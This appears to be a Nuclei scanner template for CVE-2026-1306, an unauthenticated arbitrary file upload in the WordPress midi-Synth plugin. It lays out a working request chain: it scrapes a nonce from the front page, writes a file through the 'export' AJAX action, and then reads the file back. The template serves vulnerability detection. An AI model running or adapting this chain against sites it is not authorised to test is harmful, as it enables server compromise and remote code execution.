id: CVE-2026-1306 info: name: WordPress midi-Synth <= 1.1.0 - Unauthenticated Arbitrary File Upload author: pussycat0x severity: critical description: | WordPress midi-Synth plugin \u003C= 1.1.0 contains an unrestricted file upload vulnerability caused by missing file type and extension validation in the 'export' AJAX action, letting unauthenticated attackers upload arbitrary files and potentially execute remote code, exploit requires attacker to obtain a valid nonce exposed in frontend JavaScript. impact: | Unauthenticated attackers can upload arbitrary files and potentially execute remote code on the server. remediation: | Update to the latest version of midi-Synth plugin. reference: - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/midi-synth/midi-synth-110-unauthenticated-arbitrary-file-upload-via-export-ajax-action classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2026-1306 epss-score: 0.31452 epss-percentile: 0.96898 cwe-id: CWE-434 metadata: verified: true max-request: 3 vendor: wordpress product: midi-synth framework: wordpress tags: cve,cve2026,wordpress,wp-plugin,midi-synth,file-upload,rce,intrusive variables: randstr: "{{rand_base_string(8)}}" http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Origin: {{BaseURL}} Referer: {{BaseURL}}/ action=export&nonce={{nonce}}&fileName={{randstr}}.txt&fileMidi={{base64("{{randstr}}")}} - | GET /wp-content/plugins/midi-synth/sound/{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} extractors: - type: regex name: nonce part: body internal: true regex: - 'var midiSynth_nonce = "([a-z0-9]+)"' group: 1 matchers: - type: dsl dsl: - status_code_3 == 200 - contains(body_3, "{{randstr}}") condition: and # digest: 4a0a004730450220062b277fe39ca1c772d1ecb153f53dbedcbea11617a17a0255544fb9c855ddb3022100f16b5b86c4a3a27d244034a8171b1bafb48a34878735c28b2b3a687ae2b4a088:922c64590222798bb761d5b6d8e72950